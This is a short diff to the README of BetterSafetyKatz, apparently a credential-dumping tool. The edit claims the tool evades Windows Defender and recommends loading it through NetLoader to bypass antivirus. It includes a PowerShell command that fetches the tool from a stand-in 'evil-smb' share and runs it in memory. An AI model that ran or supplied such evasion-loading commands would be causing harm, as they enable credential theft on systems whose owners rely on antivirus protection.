Flangvik/BetterSafetyKatz/README.md

 ## Detected?

-BetterSafetyKatz can be deployed using [NetLoader](https://github.com/Flangvik/NetLoader), this might bypass common AV solutions such as Windows Defender.
+BetterSafetyKatz is NOT (21.06.2020) currently detected by windows defender, when that happens, BetterSafetyKatz can be deployed using [NetLoader](https://github.com/Flangvik/NetLoader), this will keep bypassing common AV solutions such as Windows Defender.

 	PS D:\Projects\NetLoader> .\NetLoader.exe --path //evil-smb/bins/BetterSafetyKatz.exe --args coffee
 	[!] ~Flangvik , ~Arno0x #NetLoader